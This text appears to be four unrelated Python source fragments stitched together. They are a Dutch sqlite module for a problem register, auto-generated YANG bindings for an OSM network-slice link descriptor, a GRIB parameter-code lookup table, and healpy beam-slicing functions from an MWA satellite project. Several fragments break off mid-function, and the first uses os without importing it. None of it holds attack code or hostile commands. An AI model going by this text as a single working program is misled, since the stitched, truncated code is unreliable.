import sqlite3 as sql
from contextlib import closing
import logging
from probreg.shared import DataError, DBLOC, USER, kopdict, statdict, catdict
def log(msg, *args, **kwargs):
"write message to log depending on DEBUG setting"
if 'DEBUG' in os.environ and os.environ['DEBUG']:
logging.info(msg, *args, **kwargs)
def getsql(con, cmd, item=None):
"""retrieval sql uitvoeren en resultaat teruggeven
resultaat = []: query mislukt
"""
log("getsql tweede argument: {0}".format(cmd))
log("getsql derde argument: {0}".format(item))
if item is None:
item = ()
try:
result = [x for x in con.execute(cmd, item)]
except (sql.ProgrammingError, sql.OperationalError) as err:
raise DataError(str(err))
return result
def doesql(con, cmd, item=None):
"""update sql uitvoeren en resultaat terugmelden
resultaat == "" : alles ok - anders foutmelding
"""
log("doesql tweede argument: {0}".format(cmd))
log("doesql derde argument: {0}".format(item))
if item is None:
item = ()
err = ""
try:
con.execute(cmd, item)
except (TypeError, ValueError, sql.IntegrityError,
sql.ProgrammingError, sql.OperationalError) as msg:
err = str(msg)
return err
def complete_ids(dic):
"""ids genereren voor items met id = -1
input is een dictionary van 3-tuples (naam, volgorde, id)
elementen met een id van -1 krijgen in plaats van deze een passende waarde
(eerstvolgend hogere id)
"""
oldkeys, newkeys = [], []
for key, value in dic.items():
if len(value) < 3 or value[2] == -1:
newkeys.append(key)
else:
oldkeys.append((value[2], key))
if oldkeys:
oldkeys.sort()
last_id = int(oldkeys[-1][0])
else:
last_id = 0
for key in newkeys:
last_id += 1
dic[key] = (dic[key][0], dic[key][1], last_id)
def get_acties(naam, select=None, arch="", user=None):
"""selecteer acties; geef het resultaat terug of throw an exception
selectie mogelijk op id (groter dan / kleiner dan), soort, status, (deel van) titel
een selecteer-key mag een van de volgejde waarden zijn:
"idlt" - in dat geval moet de waarde een string zijn waarmee vergeleken wordt,
"idgt" - in dat geval moet de waarde een string zijn waarmee vergeleken wordt,
"soort" - in dat geval moet de waarde een list zijn van mogelijke soorten,
"status" - in dat geval moet de waarde een list zijn van mogelijke statussen,
"titel" - in dat geval moet de waarde een string zijn die in de titel moet voorkomen
eventueel wildcards:
als de string niet begint met een * dan moet de titel ermee beginnen
als de string niet eindigt met een * dan moet de titel ermee eindigen
als er een * in zit moet wat ervoor zit en erna komt in de titel zitten
het laatste argument `user` wordt niet gebruikt maar is voor compatibiliteit met de django versie
"""
if select is None:
select = {}
if not arch:
return
if "id" in select:
if "idlt" not in select and "idgt" not in select:
raise DataError("Foutieve combinatie van selectie-argumenten opgegeven")
sel = [""]
args = []
item_lt = select.pop("idlt", "")
enof = select.pop("id", "")
item_gt = select.pop("idgt", "")
if item_gt:
sel[0] += "nummer > ?"
if item_lt:
sel[0] = "({} {} ".format(sel[0], enof)
args.append(item_gt)
if item_lt:
sel[0] += "nummer < ?"
args.append(item_lt)
if item_gt:
sel[0] += ")"
if sel == [""]:
sel = []
item = select.pop("soort", "")
if item:
log(item)
if len(item) == 1:
sel.append("soort_id = ?")
args.append(item[0])
else:
append_to_sel = "soort_id in ("
for value in item[:-1]:
append_to_sel += "?,"
args.append(value)
sel.append(append_to_sel + '?)')
args.append(item[-1])
item = select.pop("status", "")
if item:
log(item)
if len(item) == 1:
sel.append("status_id = ?")
args.append(item[0])
else:
append_to_sel = "status_id in ("
for value in item[:-1]:
append_to_sel += "?,"
args.append(value)
sel.append(append_to_sel + '?)')
args.append(item[-1])
item = select.pop("titel", "")
if item:
sel.append("(about like ? or {0}_actie.title like ?)".format(naam))
args.append("%{0}%".format(item))
args.append("%{0}%".format(item))
if select:
raise DataError("Foutief selectie-argument opgegeven")
if arch == "":
sel.append("arch = 0")
elif arch == "arch":
sel.append("arch = 1")
elif arch != "alles":
raise DataError("Foutieve waarde voor archief opgegeven "
"(moet niks, 'arch' of 'alles' zijn)")
con = sql.connect(DBLOC)
cmd = "select nummer, start, {0}_status.title, {0}_status.value, {0}_soort.title, " \
"{0}_soort.value, about, {0}_actie.title, gewijzigd from {0}_actie " \
"join {0}_soort on {0}_soort.id = {0}_actie.soort_id " \
"join {0}_status on {0}_status.id = {0}_actie.status_id ".format(naam)
if sel:
cmd += "where {0}".format(" and ".join(sel))
data = getsql(con, cmd, args)
if data or len(data) == 0:
return data
else:
raise DataError(naam + " bestaat niet")
class Settings:
"""instellingen voor project
buffer tussen programma en database
self.kop is een dict met volgnummer als key en titel en link als waarde
self.stat is een dict met code als key en titel, volgorde en record-id
als waarde
self.cat idem
de get methoden zijn voor het gemak
wijzigen doe je maar direct in de attributen (properties van maken?)
"""
def __init__(self, fnaam=""):
self.kop = kopdict
self.stat = statdict
self.cat = catdict
self.imagecount = 0 # compatability with dml_xml.py
self.meld = ''
if fnaam == "":
self.meld = "Standaard waarden opgehaald"
return
self.naam = fnaam
self.read()
def read(self):
"settings lezen"
with closing(sql.connect(DBLOC)) as con:
meld = self._read(con)
self.exists = meld == ''
def _read(self, con):
"get settings from database"
con.row_factory = sql.Row
try:
data = getsql(con,
'select * from {0}_page order by "order"'.format(self.naam))
except DataError as err:
self.meld = "{} bestaat niet ({})".format(self.naam, err)
return
self.kop = {}
for row in data:
self.kop[str(row["order"])] = (row["title"], row["link"])
try:
data = getsql(con, "select * from {0}_status".format(self.naam))
except DataError as err:
self.meld = "Er is iets misgegaan ({})".format(err)
return
self.stat = {}
for row in data:
self.stat[str(row["value"])] = (row["title"], row["order"], row["id"])
try:
data = getsql(con, "select * from {0}_soort".format(self.naam))
except DataError as err:
self.meld = "Er is iets misgegaan ({})".format(err)
return
self.cat = {}
for row in data:
self.cat[row["value"]] = (row["title"], row["order"], row["id"])
def write(self, srt):
"settings terugschrijven"
with closing(sql.connect(DBLOC)) as con:
if self.exists:
rtn = self._write_existing(con, srt)
else:
rtn = self._write_new(con, srt)
if rtn:
con.rollback()
raise DataError(rtn)
else:
con.commit()
def _write_existing(self, con, srt):
"modify existing settings in datadase"
con.row_factory = sql.Row
if srt == 'kop':
_pages = getsql(con,
'select * from {0}_page order by "order"'.format(self.naam))
rtn = 0
for item in _pages:
idx = str(item["order"])
if self.kop[idx] != (item["title"], item["link"]):
rtn = doesql(con, "update {}_page set title = ?,"
' link = ? where "order" = ?'.format(self.naam),
(self.kop[idx], item['link'], idx))
if rtn:
break
elif srt == 'stat':
rtn = doesql(con, 'delete from {0}_status'.format(self.naam), None)
if not rtn:
complete_ids(self.stat)
for key, value in self.stat.items():
rtn = doesql(con, 'insert into {0}_status (id, value, '
'title, "order") values (?, ?, ?, ?)'.format(self.naam),
(value[2], key, value[0], value[1]))
if rtn:
break
elif srt == 'cat':
rtn = doesql(con, "delete from {0}_soort".format(self.naam), None)
if not rtn:
complete_ids(self.cat)
for key, value in self.cat.items():
rtn = doesql(con, 'insert into {0}_soort (id, value, '
'title, "order") values (?, ?, ?, ?)'.format(self.naam),
(value[2], key, value[0], value[1]))
if rtn:
break
return rtn
def _write_new(self, con, srt):
"initialize new settings in database"
if srt == 'kop':
for order, item in self.kop:
rtn = doesql(con, "insert into {0}_page values"
' (?,?,?,?)'.format(self.naam),
(order + 1, item[0], item[1], order))
if rtn:
break
return rtn
def get_statusid(self, waarde):
"geef id bij statuscode of -tekst"
log(waarde, type(waarde), sep=" ")
for code, value in self.stat.items():
log(code, type(code), value, sep=" ")
text, sortkey, row_id = value
## if int(waarde) == key or str(waarde) == key or waarde == value[0]:
if waarde == code or waarde == text:
return row_id
raise DataError("geen status bij code of omschrijving '{}' gevonden".format(
waarde))
def get_soortid(self, waarde):
"geef id bij soortcode of -tekst"
for code, value in self.cat.items():
text, sortkey, row_id = value
if waarde == code or waarde == text:
return row_id
raise DataError("geen soort bij code of omschrijving '{}' gevonden".format(
waarde))
def get_statustext(self, waarde):
"geef tekst bij statuscode of -id"
try:
return self.stat[waarde][0]
except KeyError:
pass
for text, sortkey, row_id in self.stat.values():
if waarde == sortkey or waarde == row_id:
return text
raise DataError("Geen omschrijving gevonden bij statuscode of -id '{}'".format(
waarde))
def get_soorttext(self, waarde):
"geef tekst bij soortcode of -id"
try:
return self.cat[waarde][0]
except KeyError:
pass
| |
"""
return self.__name
def _set_name(self, v, load=False):
"""
Setter method for name, mapped from YANG variable /nst/netslice_vld/name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_name() directly.
YANG Description: Virtual Link Descriptor (VLD) name.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)""",
})
self.__name = t
if hasattr(self, '_set'):
self._set()
def _unset_name(self):
self.__name = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
def _get_short_name(self):
"""
Getter method for short_name, mapped from YANG variable /nst/netslice_vld/short_name (string)
YANG Description: Short name to appear as label in the UI
"""
return self.__short_name
def _set_short_name(self, v, load=False):
"""
Setter method for short_name, mapped from YANG variable /nst/netslice_vld/short_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_short_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_short_name() directly.
YANG Description: Short name to appear as label in the UI
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="short-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """short_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="short-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)""",
})
self.__short_name = t
if hasattr(self, '_set'):
self._set()
def _unset_short_name(self):
self.__short_name = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="short-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
def _get_vendor(self):
"""
Getter method for vendor, mapped from YANG variable /nst/netslice_vld/vendor (string)
YANG Description: Provider of the VLD.
"""
return self.__vendor
def _set_vendor(self, v, load=False):
"""
Setter method for vendor, mapped from YANG variable /nst/netslice_vld/vendor (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_vendor is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_vendor() directly.
YANG Description: Provider of the VLD.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="vendor", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """vendor must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="vendor", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)""",
})
self.__vendor = t
if hasattr(self, '_set'):
self._set()
def _unset_vendor(self):
self.__vendor = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="vendor", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
def _get_description(self):
"""
Getter method for description, mapped from YANG variable /nst/netslice_vld/description (string)
YANG Description: Description of the VLD.
"""
return self.__description
def _set_description(self, v, load=False):
"""
Setter method for description, mapped from YANG variable /nst/netslice_vld/description (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_description is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_description() directly.
YANG Description: Description of the VLD.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """description must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)""",
})
self.__description = t
if hasattr(self, '_set'):
self._set()
def _unset_description(self):
self.__description = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
def _get_version(self):
"""
Getter method for version, mapped from YANG variable /nst/netslice_vld/version (string)
YANG Description: Version of the VLD
"""
return self.__version
def _set_version(self, v, load=False):
"""
Setter method for version, mapped from YANG variable /nst/netslice_vld/version (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_version is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_version() directly.
YANG Description: Version of the VLD
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="version", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """version must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="version", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)""",
})
self.__version = t
if hasattr(self, '_set'):
self._set()
def _unset_version(self):
self.__version = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="version", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='string', is_config=True)
def _get_type(self):
"""
Getter method for type, mapped from YANG variable /nst/netslice_vld/type (manotypes:virtual-link-type)
"""
return self.__type
def _set_type(self, v, load=False):
"""
Setter method for type, mapped from YANG variable /nst/netslice_vld/type (manotypes:virtual-link-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_type() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={u'ELAN': {}, u'ELINE': {}, u'L3': {}},), is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='manotypes:virtual-link-type', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """type must be of a type compatible with manotypes:virtual-link-type""",
'defined-type': "manotypes:virtual-link-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={u'ELAN': {}, u'ELINE': {}, u'L3': {}},), is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='manotypes:virtual-link-type', is_config=True)""",
})
self.__type = t
if hasattr(self, '_set'):
self._set()
def _unset_type(self):
self.__type = YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={u'ELAN': {}, u'ELINE': {}, u'L3': {}},), is_leaf=True, yang_name="type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='manotypes:virtual-link-type', is_config=True)
def _get_root_bandwidth(self):
"""
Getter method for root_bandwidth, mapped from YANG variable /nst/netslice_vld/root_bandwidth (uint64)
YANG Description: For ELAN this is the aggregate bandwidth.
"""
return self.__root_bandwidth
def _set_root_bandwidth(self, v, load=False):
"""
Setter method for root_bandwidth, mapped from YANG variable /nst/netslice_vld/root_bandwidth (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_root_bandwidth is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_root_bandwidth() directly.
YANG Description: For ELAN this is the aggregate bandwidth.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="root-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """root_bandwidth must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="root-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='uint64', is_config=True)""",
})
self.__root_bandwidth = t
if hasattr(self, '_set'):
self._set()
def _unset_root_bandwidth(self):
self.__root_bandwidth = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="root-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='uint64', is_config=True)
def _get_leaf_bandwidth(self):
"""
Getter method for leaf_bandwidth, mapped from YANG variable /nst/netslice_vld/leaf_bandwidth (uint64)
YANG Description: For ELAN this is the bandwidth of branches.
"""
return self.__leaf_bandwidth
def _set_leaf_bandwidth(self, v, load=False):
"""
Setter method for leaf_bandwidth, mapped from YANG variable /nst/netslice_vld/leaf_bandwidth (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_leaf_bandwidth is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_leaf_bandwidth() directly.
YANG Description: For ELAN this is the bandwidth of branches.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="leaf-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """leaf_bandwidth must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="leaf-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='uint64', is_config=True)""",
})
self.__leaf_bandwidth = t
if hasattr(self, '_set'):
self._set()
def _unset_leaf_bandwidth(self):
self.__leaf_bandwidth = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="leaf-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:etsi:osm:yang:nst', defining_module='nst', yang_type='uint64', is_config=True)
def _get_provider_network(self):
"""
Getter method for provider_network, mapped from YANG variable /nst/netslice_vld/provider_network (container)
YANG Description: Container for the provider network.
"""
return self.__provider_network
def _set_provider_network(self, v, load=False):
"""
Setter method for provider_network, mapped from YANG variable /nst/netslice_vld/provider_network (container)
If this variable is read-only (config: false) in | |
41:
return 'swval3'
if table2Version == 171 and indicatorOfParameter == 40:
return 'swval2'
if table2Version == 171 and indicatorOfParameter == 39:
return 'swval1'
if table2Version == 171 and indicatorOfParameter == 38:
return 'istal4'
if table2Version == 171 and indicatorOfParameter == 37:
return 'istal3'
if table2Version == 171 and indicatorOfParameter == 36:
return 'istal2'
if table2Version == 171 and indicatorOfParameter == 35:
return 'istal1'
if table2Version == 171 and indicatorOfParameter == 34:
return 'ssta'
if table2Version == 171 and indicatorOfParameter == 33:
return 'rsna'
if table2Version == 171 and indicatorOfParameter == 32:
return 'asna'
if table2Version == 171 and indicatorOfParameter == 31:
return 'sica'
if table2Version == 171 and indicatorOfParameter == 30:
return 'tvha'
if table2Version == 171 and indicatorOfParameter == 29:
return 'tvla'
if table2Version == 171 and indicatorOfParameter == 28:
return 'cvha'
if table2Version == 171 and indicatorOfParameter == 27:
return 'cvla'
if table2Version == 171 and indicatorOfParameter == 26:
return 'cla'
if table2Version == 171 and indicatorOfParameter == 23:
return 'ucdva'
if table2Version == 171 and indicatorOfParameter == 22:
return 'uclna'
if table2Version == 171 and indicatorOfParameter == 21:
return 'uctpa'
if table2Version == 171 and indicatorOfParameter == 14:
return 'vrwa'
if table2Version == 171 and indicatorOfParameter == 13:
return 'urwa'
if table2Version == 171 and indicatorOfParameter == 12:
return 'vdwa'
if table2Version == 171 and indicatorOfParameter == 11:
return 'udwa'
if table2Version == 171 and indicatorOfParameter == 5:
return 'septa'
if table2Version == 171 and indicatorOfParameter == 4:
return 'epta'
if table2Version == 171 and indicatorOfParameter == 3:
return 'pta'
if table2Version == 171 and indicatorOfParameter == 2:
return 'vpota'
if table2Version == 171 and indicatorOfParameter == 1:
return 'strfa'
if table2Version == 170 and indicatorOfParameter == 179:
return 'ttr'
if table2Version == 170 and indicatorOfParameter == 171:
return 'swl2'
if table2Version == 170 and indicatorOfParameter == 149:
return 'tsw'
if table2Version == 162 and indicatorOfParameter == 255:
return '~'
if table2Version == 162 and indicatorOfParameter == 233:
return '~'
if table2Version == 162 and indicatorOfParameter == 232:
return '~'
if table2Version == 162 and indicatorOfParameter == 231:
return '~'
if table2Version == 162 and indicatorOfParameter == 230:
return '~'
if table2Version == 162 and indicatorOfParameter == 229:
return '~'
if table2Version == 162 and indicatorOfParameter == 227:
return '~'
if table2Version == 162 and indicatorOfParameter == 226:
return '~'
if table2Version == 162 and indicatorOfParameter == 225:
return '~'
if table2Version == 162 and indicatorOfParameter == 224:
return '~'
if table2Version == 162 and indicatorOfParameter == 223:
return '~'
if table2Version == 162 and indicatorOfParameter == 222:
return '~'
if table2Version == 162 and indicatorOfParameter == 221:
return '~'
if table2Version == 162 and indicatorOfParameter == 220:
return '~'
if table2Version == 162 and indicatorOfParameter == 219:
return '~'
if table2Version == 162 and indicatorOfParameter == 218:
return '~'
if table2Version == 162 and indicatorOfParameter == 217:
return '~'
if table2Version == 162 and indicatorOfParameter == 216:
return '~'
if table2Version == 162 and indicatorOfParameter == 215:
return '~'
if table2Version == 162 and indicatorOfParameter == 214:
return '~'
if table2Version == 162 and indicatorOfParameter == 213:
return '~'
if table2Version == 162 and indicatorOfParameter == 212:
return '~'
if table2Version == 162 and indicatorOfParameter == 211:
return '~'
if table2Version == 162 and indicatorOfParameter == 210:
return '~'
if table2Version == 162 and indicatorOfParameter == 209:
return '~'
if table2Version == 162 and indicatorOfParameter == 208:
return '~'
if table2Version == 162 and indicatorOfParameter == 207:
return '~'
if table2Version == 162 and indicatorOfParameter == 206:
return '~'
if table2Version == 162 and indicatorOfParameter == 113:
return 'vtpha'
if table2Version == 162 and indicatorOfParameter == 112:
return 'utpha'
if table2Version == 162 and indicatorOfParameter == 111:
return 'qtpha'
if table2Version == 162 and indicatorOfParameter == 110:
return 'ttpha'
if table2Version == 162 and indicatorOfParameter == 109:
return 'tdcha'
if table2Version == 162 and indicatorOfParameter == 108:
return 'tpfa'
if table2Version == 162 and indicatorOfParameter == 107:
return 'ddra'
if table2Version == 162 and indicatorOfParameter == 106:
return 'udra'
if table2Version == 162 and indicatorOfParameter == 105:
return 'dmfa'
if table2Version == 162 and indicatorOfParameter == 104:
return 'umfa'
if table2Version == 162 and indicatorOfParameter == 103:
return 'trtca'
if table2Version == 162 and indicatorOfParameter == 102:
return 'srtca'
if table2Version == 162 and indicatorOfParameter == 101:
return 'trta'
if table2Version == 162 and indicatorOfParameter == 100:
return 'srta'
if table2Version == 162 and indicatorOfParameter == 87:
return 'viozd'
if table2Version == 162 and indicatorOfParameter == 86:
return 'vitoed'
if table2Version == 162 and indicatorOfParameter == 85:
return 'vigd'
if table2Version == 162 and indicatorOfParameter == 84:
return 'viwvd'
if table2Version == 162 and indicatorOfParameter == 83:
return 'vithed'
if table2Version == 162 and indicatorOfParameter == 82:
return 'viked'
if table2Version == 162 and indicatorOfParameter == 81:
return 'vimad'
if table2Version == 162 and indicatorOfParameter == 78:
return 'viozn'
if table2Version == 162 and indicatorOfParameter == 77:
return 'vioze'
if table2Version == 162 and indicatorOfParameter == 76:
return 'vitoen'
if table2Version == 162 and indicatorOfParameter == 75:
return 'vitoee'
if table2Version == 162 and indicatorOfParameter == 74:
return 'vign'
if table2Version == 162 and indicatorOfParameter == 73:
return 'vige'
if table2Version == 162 and indicatorOfParameter == 72:
return 'viwvn'
if table2Version == 162 and indicatorOfParameter == 71:
return 'viwve'
if table2Version == 162 and indicatorOfParameter == 70:
return 'vithen'
if table2Version == 162 and indicatorOfParameter == 69:
return 'vithee'
if table2Version == 162 and indicatorOfParameter == 68:
return 'viken'
if table2Version == 162 and indicatorOfParameter == 67:
return 'vikee'
if table2Version == 162 and indicatorOfParameter == 66:
return 'viman'
if table2Version == 162 and indicatorOfParameter == 65:
return 'vimae'
if table2Version == 162 and indicatorOfParameter == 64:
return 'viec'
if table2Version == 162 and indicatorOfParameter == 63:
return 'vitoe'
if table2Version == 162 and indicatorOfParameter == 62:
return 'vipile'
if table2Version == 162 and indicatorOfParameter == 61:
return 'vipie'
if table2Version == 162 and indicatorOfParameter == 60:
return 'vithe'
if table2Version == 162 and indicatorOfParameter == 59:
return 'vike'
if table2Version == 162 and indicatorOfParameter == 58:
return 'vioz'
if table2Version == 162 and indicatorOfParameter == 57:
return 'viiw'
if table2Version == 162 and indicatorOfParameter == 56:
return 'vilw'
if table2Version == 162 and indicatorOfParameter == 55:
return 'viwv'
if table2Version == 162 and indicatorOfParameter == 54:
return 'vit'
if table2Version == 162 and indicatorOfParameter == 53:
return 'vima'
if table2Version == 162 and indicatorOfParameter == 51:
return '~'
if table2Version == 160 and indicatorOfParameter == 254:
return 'hsdrea'
if table2Version == 160 and indicatorOfParameter == 249:
return '~'
if table2Version == 160 and indicatorOfParameter == 247:
return 'moflrea'
if table2Version == 160 and indicatorOfParameter == 246:
return '10wsrea'
if table2Version == 160 and indicatorOfParameter == 243:
return 'falrea'
if table2Version == 160 and indicatorOfParameter == 242:
return 'ccrea'
if table2Version == 160 and indicatorOfParameter == 241:
return 'clwcerrea'
if table2Version == 160 and indicatorOfParameter == 240:
return 'lsfrea'
if table2Version == 160 and indicatorOfParameter == 239:
return 'csfrea'
if table2Version == 160 and indicatorOfParameter == 231:
return 'ishfrea'
if table2Version == 160 and indicatorOfParameter == 226:
return 'wwrea'
if table2Version == 160 and indicatorOfParameter == 225:
return 'wvrea'
if table2Version == 160 and indicatorOfParameter == 224:
return 'wurea'
if table2Version == 160 and indicatorOfParameter == 223:
return 'wqrea'
if table2Version == 160 and indicatorOfParameter == 222:
return 'wtrea'
if table2Version == 160 and indicatorOfParameter == 221:
return 'wzrea'
if table2Version == 160 and indicatorOfParameter == 220:
return 'vvrea'
if table2Version == 160 and indicatorOfParameter == 219:
return 'vurea'
if table2Version == 160 and indicatorOfParameter == 218:
return 'vqrea'
if table2Version == 160 and indicatorOfParameter == 217:
return 'vtrea'
if table2Version == 160 and indicatorOfParameter == 216:
return 'vzrea'
if table2Version == 160 and indicatorOfParameter == | |
<reponame>amanchokshi/mwa-satellites
import numpy as np
import healpy as hp
import scipy.optimize as opt
import numpy.polynomial.polynomial as poly
def hp_slices_horizon(nside=None):
"""Healpix pix indices of NS, EW slices and above horizon"""
# theta phi values of each pixel
hp_indices = np.arange(hp.nside2npix(nside))
θ, ɸ = hp.pix2ang(nside, hp_indices)
# healpix indices above the horizon
above_horizon_indices = np.where(θ <= np.radians(80))[0]
# pixel coords above the horizon
ɸ_above_horizon = ɸ[above_horizon_indices]
NS_indices = []
EW_indices = []
# pixel indices along N, E, S, W slices
# order the indices such that they proceed from N -> S or E -> W
n_slice = sorted(
np.where((np.round(np.degrees(ɸ_above_horizon))) == 45)[0], reverse=True
)
e_slice = sorted(
np.where((np.round(np.degrees(ɸ_above_horizon))) == 135)[0], reverse=True
)
s_slice = sorted(np.where((np.round(np.degrees(ɸ_above_horizon))) == 225)[0])
w_slice = sorted(np.where((np.round(np.degrees(ɸ_above_horizon))) == 315)[0])
NS_indices.extend(n_slice)
NS_indices.extend(s_slice)
EW_indices.extend(e_slice)
EW_indices.extend(w_slice)
return [NS_indices, EW_indices, above_horizon_indices]
def slice_map(hp_map):
"""slices healpix map along NS, EW"""
NS_indices, EW_indices, _ = hp_slices_horizon(nside)
θ_NS, ɸ_NS = np.degrees(hp.pix2ang(nside, NS_indices))
